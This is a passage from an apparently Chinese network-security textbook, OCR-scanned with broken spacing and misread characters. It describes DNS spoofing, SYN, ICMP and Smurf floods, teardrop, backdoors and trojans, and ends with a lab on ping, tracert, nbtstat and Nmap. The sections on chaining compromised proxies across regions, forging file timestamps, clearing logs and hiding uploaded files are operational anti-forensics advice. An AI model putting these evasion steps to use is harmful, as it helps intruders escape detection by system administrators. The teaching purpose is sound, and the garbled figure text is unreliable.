制 的 Web 服务 器 上 , 即 攻击 者 可 以 将 自己 的 Web 地 址 加 在 所 有 URL 地 址 的 前 面 。 这 样 ， 
当 用 户 与 站 点 进行 安全 连接 时 ,就 会 毫 不 防备 地 进入 攻击 者 的 服务 器 ,于 是 用 户 的 所 有 信息 
便 处 于 攻击 者 的 监视 之 下 。 但 由 于 浏览 器 一 般 均 设 有 地 址 栏 和 状态 栏 , 当 浏览 器 与 某 个 站 
点 连接 时 ,可 以 在 地 址 栏 和 状态 栏 中 获得 连接 中 的 Web 站 点 地 址 及 其 相关 的 传输 信息 ,用 
户 由 此 可 以 发 现 问题 ,因此 攻击 者 往往 在 URL 地 址 重 写 的 同时 ,利用 相关 信息 排 盖 技术 ， 
一 般 用 JavaScript 或 VB Scrip 程序 来 重 写 地 址 栏 和 状态 栏 , 以 达到 其 掩盖 欺骗 的 目的 。 可 
以 通过 禁止 执行 Script 功能 来 防范 URL 重 写 。 

5. DNS 欺骗 

当 一 个 DNS 服务 器 掉 入 陷阱 ,使 用 了 来 自 一 个 恶意 DNS 服务 器 的 错误 信息 ,那么 该 
DNS 服务 器 就 被 欺骗 了 。DNS 攻击 途径 主要 包括 缓存 感染 、DNS 信息 动 持 ,DNS 重 定向 。 

缓存 感染 是 将 数据 放 入 一 个 没有 设防 的 DNS 服务 器 的 缓存 当中 。 这 些 缓存 信息 会 在 
客户 进行 DNS 访问 时 返回 给 客户 ,从 而 将 客户 引导 到 入 侵 者 所 设置 的 运行 木马 的 Web 服 


第 5 章 网络 攻击 技术 125 


务 器 或 邮件 服务 器 上 ,然后 黑客 从 这 些 服 务 器 上 获取 用 户 信息 。 

DNS 信息 劫持 是 入 侵 者 通过 监听 客户 端 和 DNS 服务 器 的 对 话 , 通 过 猜测 服务 器 响应 
给 客户 端的 DNS 查询 ID。 每 个 DNS 报 文 包括 一 个 相关 联 的 16 位 ID 号 ,DNS 服务 器 根据 
这 个 ID 号 获取 请 求 源 位 置 。 黑 客 在 DNS 服务 器 之 前 将 虚假 的 响应 交 给 用 户 , 从 而 欺骗 客 
户 端 去 访问 恶意 的 网 站 。 

DNS 重 定向 是 攻击 者 能 够 将 DNS 名 称 查询 重 定向 到 恶意 DNS 服务 器 ,这 样 攻击 者 可 
以 获得 DNS 服务 器 的 写 权限 。 

用 户 可 以 直接 用 IP 访问 重要 的 服务 ,这样 至 少 可 以 避 开 DNS 欺骗 攻击 。 但 这 需要 记 
住 要 访问 的 卫 地 址 。 还 可 以 加 密 所 有 对 外 的 数据 流 , 对 服务 器 来 说 就 是 尽量 使 用 SSH 之 
类 的 有 加 密 支持 的 协议 ,对 一 般 用 户 应 该 用 PGP 之 类 的 软件 加 密 所 有 发 到 网 络 上 的 数据 来 
防范 DNS 欺骗 攻击 。 


5.3.5 拒绝 服务 攻击 


1. 基本 概念 

DoS(Denial of Service) 是 拒绝 服务 的 缩写 ,不 能 认为 是 微软 的 DOS 操作 系统 。DoS 攻 
击 是 一 种 利用 合理 的 服务 请 求 占 用 过 多 的 服务 资源 ,从 而 使 合法 用 户 无 法 得 到 服务 响应 的 
网 络 攻击 行为 。 

单一 的 DoS 攻击 一 般 采 用 一 对 一 的 方式 , 当 攻 击 目标 CPU 速度 低 、 内 存 小 或 网 络 带 宽 
小 等 各 项 性 能 指标 不 高 时 , 它 的 效果 是 明显 的 。 随 着 计算 机 与 网 络 技术 的 发 展 , 计 算 机 的 处 
理 能 力 迅速 增强 ,内存 大 大 增加 ,同时 也 出 现 了 千 兆 级 别 的 网 络 ,这 使 得 DoS 攻击 的 困难 程 
度 加 大 了 ,例如 攻击 者 的 攻击 软件 每 秒 钟 可 以 发 送 4000 个 攻击 包 , 但 用 户 的 主机 与 网 络 带 
宽 每 秒 钟 可 以 处 理 10 000 个 攻击 包 , 这 样 攻击 就 不 会 产生 什么 效果 。 

这 时 候 分 布 式 的 拒绝 服务 攻击 手段 (DDoS) 就 应 运 而 生 了 。 如 果 说 计算 机 与 网 络 的 处 
理 能 力 加 强 了 10 倍 ,用 一 台 攻 击 机 来 攻击 不 再 能 起 作用 的 话 ,攻击 者 使 用 10 台 攻 击 机 同时 
攻击 呢 ? 用 100 台 呢 ? DDoS 就 是 利用 更 多 的 “ 倪 偶 机 ?来 发 起 进攻 ,以 比 从 前 更 大 的 规模 
来 进攻 受害 者 。 

分 布 式 拒绝 服务 攻击 DDoS 是 在 传统 的 DoS 攻击 基础 之 上 产生 的 一 类 攻击 方式 。 
DDoS 是 利用 多 台 计 算 机 ,采用 了 分 布 式 对 单个 或 多 个 目标 同时 发 起 DoS 攻击 。DDoS 攻 
击 由 三 部 分 组 成 : 客户 端 程序 (黑客 主机 )、 控 制 点 (master) ,代理 程序 (zombie) ,或 称 为 攻 
击 点 (daemon) ,如 图 5-15 所 示 。 

被 DoS 攻击 时 常见 的 一 些 现 象 如 下 。 

(1) 被 攻击 主机 上 有 大 量 等 待 的 TCP 连接 。 

(2) 网 络 中 充斥 着 大 量 的 无 用 的 数据 包 , 源 地 址 为 假 。 

(3) 制造 高 流量 无 用 数据 ,造成 网 络 拥塞 ,使 受害 主机 无 法 正常 与 外 界 通 信 。 

(4) 利用 受害 主机 提供 的 服务 或 传输 协议 上 的 缺陷 ,反复 高 速 地 发 出 特定 的 服务 请 求 ， 
使 受害 主机 无 法 及 时 处 理 所 有 正常 请 求 。 

(5) 严重 时 会 造成 系统 死机 。 

2. TCP SYN 拒绝 服务 攻击 


TCP SYN 拒绝 服务 攻击 是 利用 了 TCP/IP 协议 的 固有 漏洞 。 面 向 连接 的 TCP 三 次 握 
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攻击 俐 仿 机 


攻击 做 偏 机 


控制 便 偶 机 


加 


攻击 仇 介 机 


攻击 仇 偏 机 


图 5-15 DDoS 攻击 组 成 


手 是 TCP SYN 拒绝 服务 攻击 存在 的 基础 。 

一 般 情 况 下 ,一 个 TCP 连接 的 建立 需要 经 过 三 次 握手 的 过 程 ,如 图 5-16 所 示 , 即 : 

(1) 建立 发 起 者 向 目标 计算 机 发 送 一 个 TCP SYN 报 文 。 

(2) 目标 计算 机 收 到 这 个 SYN 报 文 后 ,在 内 存 中 创建 TCP 连接 控制 块 (TCB) ,然后 向 
发 起 者 回 送 一 个 TCP ACK 报 文 , 等 待 发 起 者 的 回应 。 

(3) 发 起 者 收 到 TCP ACK 报 文 后 ,再 回应 一 个 ACK 报 文 ,这 样 TCP 连接 就 建立 起 
庆 了 s 


DLsYN 
客户 机 
I = < SYN+ACK |® 服务 站 
@LACK 


图 5-16 ”TCP 连接 的 三 次 握手 过 程 


利用 这 个 过 程 ,一 些 恶意 的 攻击 者 可 以 进行 所 谓 的 TCP SYN 拒绝 服务 攻击 ,如 图 5-17 
所 示 。 

(1) 攻击 者 向 目标 计算 机 发 送 一 个 TCP SYN 报 文 。 

(2) 目标 计算 机 收 到 这 个 报 文 后 ,建立 TCP 连接 控制 结构 (TCB), 并 回应 一 个 ACK， 
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OLSYN 
攻击 机 


1 = < SYN+ACK |® 服务 器 
@[T— 个 SYN》 


图 5-17 TCP SYN 拒绝 服务 攻击 


等 待 发 起 者 的 回应 。 

(3) 而 发 起 者 则 不 向 目标 计算 机 回应 ACK 报 文 ,这 样 导致 目标 计算 机 一 直 处 于 等 待 

可 以 看 出 ,目标 计算 机 如 果 接 收 到 TCP SYN 报 文 ,而 没有 收 到 发 起 者 的 第 三 次 ACK 
回应 ,会 一 直 等 待 (第 三 次 握手 无 法 完成 ) ,这 种 情况 下 服务 器 端 一 般 会 重 试 ( 再 次 发 送 SYN 十 
ACK 给 客户 端 ) 并 等 待 一 段 时 间 后 丢弃 这 个 未 完成 的 连接 ,这 段 时 间 的 长 度 称 为 SYN 
Timeonut ,一 般 来 说 这 个 时 间 是 分 钟 的 数量 级 (一 般 为 0.5 一 2 分 钟 ); 一 个 用 户 出 现 异 常 导 
致 服务 器 的 一 个 线程 等 待 1 分 钟 并 不 是 什么 很 大 的 问题 ,但 如 果 有 一 个 恶意 的 攻击 者 大 量 
模拟 这 种 情况 ,服务 器 端 将 为 了 维护 一 个 非常 大 的 半 连 接 列 表 而 消耗 非常 多 的 资源 一 一 数 
以 万 计 的 半 连 接 , 这 将 会 把 目标 计算 机 的 资源 耗 尽 , 而 不 能 响应 正常 的 TCP 连接 请 求 。 

针对 SYN 拒绝 服务 攻击 的 防御 措施 主要 有 : 一 类 是 通过 防火 墙 .路 由 器 等 过 滤 网 关 防 
护 , 另 一 类 是 通过 加 固 TCP/IP 协议 栈 防 御 。 

网 关 防 护 的 主要 技术 有 SYN-cookie 技术 和 基于 监控 的 源 地 址 状态 .缩短 SYN 
Timeout 时 间 。SYN-cookie 技术 实现 了 无 状态 的 握手 ,避免 SYN Flood 的 资源 消耗 。 基 于 
监控 的 源 地 址 状态 技术 能 够 对 每 一 个 连接 服务 器 的 IP 地 址 的 状态 进行 监控 ,主动 采取 措施 
避免 SYN Flood 攻击 的 影响 。 

3. ICMP 洪水 、UDP 洪水 

正常 情况 下 ,为 了 对 网 络 进行 诊断 ,一 些 诊断 程序 ,如 Ping 等 会 发 出 ICMP 响应 请 求 报 
文 (ICMP ECHO) ,接收 计算 机 接收 到 ICMP ECHO 后 会 回应 一 个 ICMP ECHO Reply 报 
文 。 而 这 个 过 程 是 需要 CPU 处 理 的 ,有 的 情况 下 还 可 能 消耗 掉 大 量 的 资源 ,如 处 理 分 片 的 
时 候 。 这 样 如 果 攻 击 者 向 目标 计算 机 发 送 大 量 的 ICMP ECHO 报 文 (产生 ICMP 洪水 ), 则 
目标 计算 机 会 忙于 处 理 这 些 ECHO 报 文 ,而 无 法 继续 处 理 其 他 的 网 络 数据 报 文 ,这 也 是 一 
种 拒绝 服务 攻击 (DoS) 。 

UDP 洪水 的 原理 与 ICMP 洪水 类 似 , 攻 击 者 通过 发 送 大 量 的 UDP 报 文 给 目标 计算 机 ， 
导致 目标 计算 机 忙于 处 理 这 些 UDP 报 文 而 无 法 继续 处 理 正常 的 报 文 。 

4. Smurf 攻击 


Smurf 是 一 种 具有 放大 效果 的 DoS 攻击 ,具有 很 大 的 危害 性 。 这 种 攻击 形式 利用 了 
TCP/IP 中 的 定向 广播 的 特性 。 

人 们 通常 使 用 ICMP ECHO 请 求 包 用 来 对 网 络 进行 诊断 , 当 一 台 计 算 机 接收 到 这 样 一 
个 报 文 后 ,会 向 报 文 的 源 地 址 回应 一 个 ICMP ECHO Reply。 一 般 情况 下 ,计算 机 是 不 检查 
该 ECHO 请 求 的 源 地 址 的 ,因此 ,如 果 一 个 恶意 的 攻击 者 把 ECHO 的 源 地 址 设置 为 一 个 广 
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播 地 址 ,这 样 计算 机 在 回复 ICMP ECHO Reply 的 时 候 , 就 会 以 广播 地 址 为 目的 地 址 ,这 样 
本 地 网 络 上 所 有 的 计算 机 都 必须 处 理 这 些 广播 报 文 。 如 果 攻 击 者 发 送 的 ECHO 请 求 报 文 
足够 多 ,产生 的 ICMP ECHO Reply 广播 报 文 就 可 能 把 整个 网 络 淹没 。 这 就 是 所 谓 的 
Smurf 攻击 。 

除了 把 ECHO 报 文 的 源 地 址 设置 为 广播 地 址 外 ,攻击 者 还 可 能 把 源 地 址 设置 为 一 个 子 
网 广播 地 址 ,这 样 ,该 子 网 所 在 的 计算 机 就 可 能 受 影响 。 

为 了 防止 成 为 DoS 的 帮凶 ,最 好 关闭 外 部 路 由 器 或 防火 墙 的 广播 地 址 特性 ; 在 防火 墙 
上 过 滤 掉 ICMP 报 文 ,或 者 在 服务 器 上 禁止 Ping, 并 且 只 在 必要 时 才 打开 Ping 服务 。 

5. 泪 滴 攻击 

利用 在 TCP/IP 堆栈 中 实现 信任 IP 碎片 中 的 包 的 标题 头 所 包含 的 信息 来 实现 自己 的 
攻击 。IP 分 段 含 有 指明 该 分 段 所 包含 的 是 原 包 的 哪 一 段 的 信息 , 某 些 TCP/IP (包括 
Service pack 4 以 前 的 Windows NT) 在 收 到 含有 重 释 偏 移 的 伪造 分 段 时 将 崩溃 。 

对 于 一 些 大 的 IP 包 , 需 要 对 其 进行 分 片 传送 ,这 是 为 了 迎合 链 路 层 的 MTU( 最 大 传输 
单元 ) 的 要 求 。 例 如 ,一 个 4500 字 节 的 IP 包 在 MTU 为 1500 的 链 路 上 传输 的 时 候 就 需要 
分 成 有 个 王 包 5 

在 IP 报头 中 有 一 个 偏 移 字 段 和 一 个 分 片 标志 (MEF) ,如 果 MF 标志 设置 为 1, 则 表面 这 
个 IP 包 是 一 个 大 IP 包 的 片断 ,其 中 偏 移 字段 指出 了 这 个 片断 在 整个 IP 包 中 的 位 置 。 

例如 ,对 一 个 4500 字 节 的 IP 包 进行 分 片 (MTU 为 1500), 则 3 个 片断 中 偏 移 字段 的 值 
依次 为 0.1500.3000。 这 样 接收 端 就 可 以 根据 这 些 信息 成 功 地 组 装 该 IP 包 。 

如 果 一 个 攻击 者 打破 这 种 正常 情况 ,把 偏 移 字段 设置 成 不 正确 的 值 , 即 可 能 出 现 重合 或 
断 开 的 情况 ,就 可 能 导致 目标 操作 系统 崩溃 。 例 如 ,把 上 述 偏 移 设置 为 0.1300.3000。 这 就 
是 所 谓 的 泪 滴 攻击 。 

防御 泪 滴 攻击 的 最 好 办 法 是 升级 服务 包 软 件 , 如 下 载 操作 系统 补丁 或 升级 操作 系统 等 ; 
在 设置 防火 墙 时 对 分 组 进行 重组 ,而 不 进行 转发 ,这 样 也 可 以 防止 这 种 攻击 。 


s.4 网 络 后 门 与 网 络 隐身 巩固 技术 


在 大 多 数 情况 下 ,攻击 者 和 人 侵 一 个 系统 后 ,他 可 能 还 想 在 适当 的 时 候 再 次 进入 系统 。 例 
如 ,如 果 攻 击 者 入 侵 了 一 个 站 点 ,将 它 作 为 一 个 对 其 他 系统 进行 攻击 的 平台 或 是 跳板 ,他 就 
会 想 在 适当 的 时 候 登 录 到 这 个 站 点 取 回 他 以 前 存放 在 系统 里 面 的 工具 进行 新 的 攻击 。 很 容 
易 想到 的 方法 就 是 在 这 个 已 经 被 入 侵 的 系统 中 留 一 个 后 门 。 但 是 ,非常 关键 的 是 ,不 但 要 留 
下 下 次 进入 的 通道 ,而 且 还 要 对 自己 所 做 的 一 切 加 以 隐藏 ,如 果 建 立 起 的 后 门 马上 就 被 管理 
员 发 现 就 没有 任何 用 处 了 。 


5.4.1 网 络 后 门 


简单 地 说 ,后 门 (backdoor) 就 是 攻击 者 再 次 进入 网 络 或 系统 而 不 被 发 现 的 隐蔽 通道 。 
最 简单 的 方法 就 是 打开 一 个 被 端口 监听 代理 所 监听 的 端口 ,有 很 多 软件 可 以 做 到 这 一 点 。 
如 果 用 户 使 用 端口 扫描 器 对 网 络 内 部 所 有 计算 机 从 端口 1 到 端口 1023 进行 扫描 ,假如 
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攻击 者 打开 的 端口 是 5050 ,那么 就 永远 也 不 会 被 发 现 。 这 也 是 在 扫描 时 必须 对 所 有 的 计算 
机 从 端口 1 到 端口 65535 进行 扫描 的 原因 。 而 且 不 是 一 次 就 可 以 了 ,需要 两 次 ,一 次 为 
TCP ,一 次 为 UDP。 因 为 越 来 越 多 的 公司 已 经 渐渐 地 加 强 了 对 TCP 端口 的 管理 而 忽视 了 
UDP 端口 的 管理 ,所 以 很 多 攻击 者 将 开放 的 端口 都 选择 在 UDP 端口 了 。 

在 获得 了 系统 的 存储 权时 ,建立 后 门 是 相当 容易 的 ,但 是 在 没有 完全 获得 对 系统 的 存 取 
权限 时 ,一 般 可 以 通过 使 用 木马 来 实现 。 木 马 是 可 以 驻 留 在 对 方 系统 中 的 一 种 程序 。 木 马 
一 般 由 两 部 分 组 成 : 服务 器 端 和 客户 端 。 驻 留 在 对 方 服 务 器 的 称 为 木马 的 服务 器 端 ,远程 
的 可 以 连 到 木马 服务 器 的 程序 称 为 客户 端 。 木 马 的 功能 是 通过 客户 端 可 以 操纵 服务 器 , 进 
而 操纵 对 方 的 主机 。 木 马 程序 在 表面 上 看 没有 任何 的 损害 ,实际 上 隐藏 着 可 以 控制 用 户 整 
个 计算 机 系统 .打开 后 门 等 危害 系统 安全 的 功能 。 

木马 来 自 * 特 洛 伊 木马 ” ,英文 名 称 为 Trojan Horse。 传 说 希腊 人 围攻 特洛伊 城 ,久久 不 
能 攻克 ,后 来 军师 想 出 了 一 个 特洛伊 木马 计 , 让 士兵 藏 在 巨大 的 特洛伊 木马 中 ,部 队 假装 撤 
退 而 将 特洛伊 木马 丢弃 在 特洛伊 城下 ,让 敌人 将 其 作为 战利品 拖 和 人 城中 ,到 了 夜里 ,特洛伊 
木马 内 的 士兵 便 趁 着 夜里 敌人 庆祝 胜利 、 放 松 警惕 的 时 候 从 特洛伊 木马 里 悄悄 地 疏 出 来 ,与 
城 外 的 部 队 里 应 外 合 攻 下 了 特洛伊 城 。 由 于 特洛伊 木马 程序 的 功能 与 此 类 似 , 故 而 得 名 。 

对 于 大 多 数 特 洛 伊 木马 程序 来 说 ,服务 器 端 程序 的 功能 就 是 在 受 攻击 的 系统 中 建立 
后 门 。 


5.4.2 设置 代理 跳板 


当 从 本 地 人 侵 其 他 主机 的 时 候 , 自 己 的 IP 会 暴露 给 对 方 。 通 过 将 某 一 台 主 机 设置 为 代 
理 , 通 过 该 主机 再 人 侵 其 他 主机 ,这 样 就 会 留 下 代理 的 IP 地 址 ,这 样 就 可 以 有 效 地 保护 自己 
的 安全 。 二 级 代理 的 基本 结构 如 图 5-18 所 示 。 


[4 | 


本 地 计算 机 代理 服务 器 一 代理 服务 器 二 被 入 侵 的 主机 
图 5-18 二 级 代理 的 基本 结构 


本 地 通过 两 级 代理 入 侵 某 一 台 主 机 ,这 样 在 被 入 侵 的 主机 上 就 不 会 留 下 自己 的 信息 。 
可 以 选择 更 多 的 代理 级 别 , 但 是 考虑 到 网 络 带 宽 的 问题 ,一 般 选择 两 到 三 级 代理 比较 合适 。 

选择 代理 服务 的 原则 是 选择 不 同 地 区 的 主机 作为 代理 。 例 如 ,现在 要 入 侵 北美 的 某 一 
台 主 机 ,选择 南非 的 某 一 台 主 机 作为 一 级 代理 服务 器 ,选择 北欧 的 某 一 台 计 算 机 作为 二 级 代 
理 , 再 选择 南美 的 一 台 主 机 作为 三 级 代理 服务 器 ,这 样 很 安全 了 。 

可 以 选择 做 代理 的 主机 有 一 个 先决 条 件 ,必须 先 安装 相关 的 代理 软件 ,一 般 都 是 将 已 经 
被 入 侵 的 主机 作为 代理 服务 器 。 


5.4.3 清除 日 志 


当成 功 获取 了 存 取 权 限 且 完成 了 自己 的 预定 目标 后 ,攻击 者 还 有 最 后 一 个 工作 要 完 
成 一 一 隐藏 攻击 踪迹 。 这 其 中 包括 重新 进入 系统 ,将 所 有 能 够 表明 他 曾经 来 过 的 证 据 隐 藏 
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起 来 。 为 达到 这 个 目的 ,有 4 个 方面 的 工作 要 做 。 

1. 日 志文 件 

大 多 数 系统 都 是 通过 记录 日 志文 件 来 检测 是 谁 进 入 过 系统 并 且 停留 了 多 长 时 间 。 根 据 
日 志文 件 所 设置 的 级 别 不 同 , 还 可 以 发 现 他 们 做 了 些 什 么 ,对 哪些 文件 进行 了 操作 。 

在 利用 日 志文 件 监测 之 前 ,必须 先 做 两 件 事 : 第 一 ,必须 将 系统 的 日 志 记录 功能 打开 ， 
第 二 ,对 日 志文 件 内 容 进行 详细 阅读 。 很 多 管理 员 没 有 将 记录 日 志文 件 的 功能 选项 打开 ,而 
且 即 使 打开 了 ,也 没有 对 它 进行 定时 阅读 。 所 以 ,即使 黑客 没有 对 自己 的 踪迹 进行 任何 的 消 
隐 , 也 有 很 大 的 可 能 不 被 发 现 。 

有 经 验 的 攻击 者 都 不 会 冒 这 个 险 ,他 们 会 清除 所 有 的 日 志文 件 。 可 以 采取 两 种 方式 。 
最 简单 的 一 种 是 进入 系统 然后 将 所 有 的 日 志文 件 删除 。 当 数量 很 大 的 日 志文 件 突然 之 间 变 
得 很 小 的 话 , 系 统 会 自动 通知 系统 管理 员 ,因为 每 个 日 志文 件 的 结束 处 都 有 一 个 触发 器 。 第 
二 种 方法 是 攻击 者 可 以 “医治 "日志 文件 ,首先 取得 日 志文 件 , 然 后 将 其 中 有 关 攻 击 记录 的 部 
分 删除 。 根 据 所 攻击 的 系统 不 同 ,工作 的 难度 有 所 不 同 ,因为 Windows NT 系统 和 UNIX 
系统 处 理 日 志文 件 的 方法 不 同 。 

2. 文件 信息 

为 了 获得 系统 的 存 取 权 限 和 在 系统 中 建立 后 门 ,攻击 者 通常 必须 对 某 些 系统 文件 进行 
修改 。 当 他 们 这 样 做 后 ,文件 的 一 些 信息 ,如 修改 时 间 和 文件 长 度 就 会 发 生变 化 ,通过 这 些 
也 可 以 确定 系统 是 否 曾 经 遭受 过 攻击 。 

对 于 攻击 者 而 言 , 在 进入 系统 并 且 植 人 后 门 程序 以 后 再 把 系统 还 原 成 以 前 的 状态 是 非 
常 关键 的 。 因 此 ,每 一 个 曾经 被 修改 的 文件 都 应 该 被 恢复 成 或 者 假扮 成 原状 。 

对 于 文件 的 修改 日 期 来 说 ,可 以 轻而易举 做 到 这 一 点 : 进入 系统 ,将 系统 时 间 修 改 成 第 
一 次 修改 文件 的 时 间 ,然后 对 文件 进行 读 取 , 因 为 系统 并 不 清楚 当前 的 日 期 是 错误 的 ,这 样 
文件 看 起 来 就 像 是 在 第 一 次 安装 时 修改 过 的 一 样 ,不 会 引起 怀疑 。 然 后 再 将 原来 错误 的 日 
期 改变 成 正确 的 日 期 。 

3. 另外 的 信息 

在 很 多 情况 下 ,黑客 为 了 达到 进入 系统 获取 权限 目的 ,必须 另外 上 传 或 安装 一 些 文件 。 
这 些 用 来 隐藏 踪迹 或 用 来 对 别 的 站 点 进行 新 攻击 的 文件 通常 会 占用 一 定 的 磁盘 空间 。 系 统 
管理 员 可 以 通过 磁盘 空余 空间 的 检查 来 确定 是 否 发 生 过 攻击 。 

攻击 者 想 隐 藏 他 们 上 传 的 系统 附加 文件 ,他 们 可 以 使 用 以 下 方法 。 

为 文件 设置 隐藏 属性 : 所 有 的 文件 系统 都 可 以 让 文件 的 属 主将 文件 设置 为 隐藏 。 当 某 
个 文件 设置 为 隐藏 ,如果 用 户 仅 仅 是 使 用 命令 显示 文件 时 ,就 看 不 到 这 个 文件 。 
将 文件 重 命名 : 在 大 多 数 系统 中 都 有 一 个 系统 目录 ,其 中 存放 了 很 多 重要 的 文件 。 攻 
击 者 可 以 将 自己 的 文件 名 称 改 成 和 这 些 文件 差不多 ,那么 被 管理 员 发 现 的 可 能 性 就 非常 小 。 
这 适合 要 隐藏 的 文件 比较 少 的 情况 。 

建立 隐藏 的 目录 或 共享 设备 : 如 果 一 个 硬盘 空间 很 大 ,可 以 创建 很 多 个 分 区 。 一 般 情 
况 下 ,系统 管理 员 只 检查 系统 的 主要 分 区 ,因此 如 果 攻 击 者 建立 了 一 个 另外 的 分 区 ,很 可 能 
就 会 逃 过 系统 管理 员 的 检查 。 这 适合 需要 隐藏 大 量 文 件 的 时 候 。 

改变 磁盘 空间 的 工具 : 如 果 管 理 员 使 用 某 个 工具 来 检查 系统 剩余 空间 ,他 就 会 发 现 硬 
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盘 空 间 的 问题 。 而 如 果 攻 击 者 能 够 上 传 一 个 木马 ,就 可 以 欺骗 管理 员 有 多 少 空间 剩余 。 

使 用 Steganography 工具 : Steganography 或 信息 隐藏 工具 都 可 以 使 攻击 者 将 自己 的 
信息 隐藏 到 另外 一 个 文件 中 。 所 以 黑客 利用 这 种 工具 将 自己 重要 的 文件 隐藏 到 系统 重要 的 
交 件 中 。 

4. 网 络 通信 流量 

当 黑 客 对 某 个 系统 进行 攻击 时 ,大 多 数 情况 下 是 通过 网 络 进行 的 。 这 也 意味 着 攻击 者 
必须 对 自己 在 网 络 上 留 下 的 痕迹 进行 清除 。 由 于 网 络 系统 都 运行 着 IDS( 入 侵 检 测 系 统 )， 
任何 可 疑 的 网 络 通信 都 会 被 打上 标记 。 而 要 删 去 IDS 上 的 记录 是 非常 困难 的 ,因为 它 是 实 
时 监测 的 。 

随 着 网 络 人 侵 检 测 系统 和 防火 墙 的 广泛 使 用 ,攻击 者 需要 注意 如 何 隐藏 网 络 上 的 踪迹 。 
如 果 攻 击 者 能 够 隐藏 自己 的 攻击 或 将 它们 假扮 成 网 络 上 的 合法 的 通信 信息 ,使 它们 看 起 来 
不 那么 引 人 注 目 , 就 有 可 能 逃脱 被 追捕 的 命运 。 可 以 利用 的 工具 如 Loki、Reverse www 
shell`CovertTCP。 前 两 个 是 将 攻击 者 所 留 下 的 痕迹 假扮 成 网 络 合法 的 通信 信息 ,第 三 个 程 
序 是 通过 将 这 些 痕 迹 隐 藏 在 数据 包 中 来 躲避 管理 员 的 检测 。 


《E39 由 信息 搜集 与 漏洞 扫 措 


/ 实 训 目的 
通过 本 实 训 初步 了 解 网 络 人 侵 和 攻击 的 方法 及 一 般 的 应 对 方法 ,掌握 常见 工具 的 基本 
应 用 ,主要 包括 了 解 网 络 主 机 信息 搜集 的 方法 和 工具 ; 了 解 安全 扫描 技术 。 


/ 实 训 内 容 
1. 使 用 常见 工具 对 目标 主机 进行 信息 搜集 。 
2. 漏洞 扫描 。 


/ 实 训 环境 
实验 设备 : Windows 7 系统 、 VMWare 虚拟 机 系统 。 


/ 实 训 步 又 

1. 利用 工具 软件 搜集 信息 

Q@ Ping。Ping 用 来 判断 目标 是 否 活动 ; 最 常用 、 最 简单 的 探测 手段 ; Ping 程序 一 般 是 
直接 实现 在 系统 内 核 中 的 ,而 不 是 一 个 用 户 进程 。 

由 于 不 同系 统 对 ICMP 做 出 的 响应 不 同 ,因此 TTL 字段 值 可 以 帮助 用 户 识 别 操作 系 
统 类 型 ,Ping 不 同 操作 系统 的 TTL 取 值 不 同 ,如 表 5-1 所 示 。 

一 般 Ping 出 来 的 TTL 值 可 能 不 是 以 上 所 提 的 数字 ,往往 只 是 一 个 接近 的 值 。TTL 值 
每 经 过 一 个 路 由 器 就 会 减 1, 如 果 减 到 0 就 会 被 抛弃 。TTL=50 的 时 候 就 是 说 你 发 一 个 数 
据 到 你 Ping 的 地 址 期 间 要 通过 14 个 路 由 器 。 如 果 TTL=126 就 是 中 间 要 通过 两 个 路 由 
器 。 因 此 ,如 果 接 近 255 就 是 UNIX 系统 ,如 果 接 近 128 就 是 Windows 系统 。 


这 些 


表 5-1 操作 系统 类 型 与 TTL 对 应 表 
操作 系统 类 型 TTL 值 
Windows 95/98/ME 32 
Windows NT/2000 128 
Linux Kernel 2. 2. x/2. 4. x 64 
Compaq Tru64 5.0 64 


FreeBSD 4. 1/ 4.0/3.4 


Sun Solaris 
OpenBSD 2.6/2.7 
NetBSDHP UX 10. 20 


Ping 新 浪 网 站 的 域名 。 
C:\> Ping www. sina. com. cn 


Pinging tucana. sina. com. cn [60. 28.175.227] with 32 bytes of data: 


Reply from 60. 28.175.227: 
Reply from 60.28.175.227: 
Reply from 60.28.175.227: 
Reply from 60.28.175.227: 


Ping statistics for 60.28 


bytes = 32 time = 44ms TIL = 53 
bytes = 32 time = 43ms TIL = 53 
bytes = 32 time = 44ms TTL = 53 
bytes = 32 time = 46ms TTL = 53 


327 


Packets: Sent = 4，Received = 4, Lost =0 (0% loss)， 
Approximate round trip times in milli ~ seconds: 
Minimum = 43ms, Maximum = 46ms, Average = 44ms 


@ Tracert。Tracert, 跟 踪 从 本 地 开始 到 达 某 


-目标 地 址 所 经 过 的 路 由 设备 ,并 显示 出 


路 由 设备 的 IP、 连 


所 示 。 


类 时 间 等 信息 


例如 ,tracert www. sina. com. cn, 结 果 如 图 5-19 


IC:\pocunents and SettingsNhdministrator?tracert wuw.sina.com.cn 


Iracing route to cmnetnews-sina-com-cn [221.179.188.74] 


18.21.8.1 
186.2.8.145 
Request tined out. 
Request tined out. 
218 - 

221. 

221. 

221. 

111. 

221. 

221- 


图 5-19 ”Tracert 结果 
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@ Nbtstat。Nbtstat 主要 用 于 对 NetBIOS 系统 (特别 是 Windows 计算 机 ) 的 侦 测 ,可 
获知 目标 系统 的 信息 和 当前 登录 的 用 户 , 判 断 目标 系统 上 的 服务 , 读 取 和 清除 其 Cache 中 的 
内 容 等 。 网 络 人 侵 者 可 以 通过 从 nbtstat 获得 的 输出 信息 开始 搜集 有 关 对 方 机 器 的 信息 。 

如 果 已 知 某 台 Windows 主机 的 IP 地 址 ,输入 命令 “nbtstat -A 192. 168.0.111” 可 以 查 
看 其 名 字 列 表 , 如 图 5-20 所 示 。 


CA\WINNT\System32\cmd exe 


NetBIOS Local Nane Table 


Nane Status 
INet“Services 《1C> Registered 
Registered 
Registered 
Registered 
Registered 
Registered 
Registered 
Registered 
Registered 
Registered 
Registered 
Registered 


图 5-20 查看 远程 主机 的 名 字 列 表 


通过 检查 nbtstat 命令 的 结果 ,可 以 找到 < 03 > 识别 符 。 采 用 < 03 > 识别 符 的 表 目 是 用 
户 名 或 机 器 名 。 如 果 有 人 从 本 地 登录 到 该 机 器 上 ,就 会 看 到 两 个 < 03 > 识别 符 。 在 一 般 情 
况 下 ,第 一 个 < 03 > 识别 符 是 机 器 的 NetBIOS 名 称 ,第 二 个 < 03 > 识别 符 是 本 地 登录 用 户 的 
名 称 。 

2. 扫描 工具 Nmap 

Nmap 是 一 款 网 络 扫 描 和 主机 检测 的 非常 有 用 的 工具 。Nmap 是 不 局 限于 仅仅 收集 信 
息 和 枚 举 , 同 时 可 以 用 来 作为 一 个 漏洞 探测 器 或 安全 扫描 器 。 它 可 以 适用 于 Windows、 
Linux、Mac 等 操作 系统 。Nmap 是 一 款 非常 强大 的 实用 工具 ,可 用 于 以 下 几 个 方面 。 

(1) 检测 存活 在 网 络 上 的 主机 (主机 发 现 ) 。 

(2) 检测 主机 上 开放 的 端口 (端口 发 现 或 枚 举 )。 

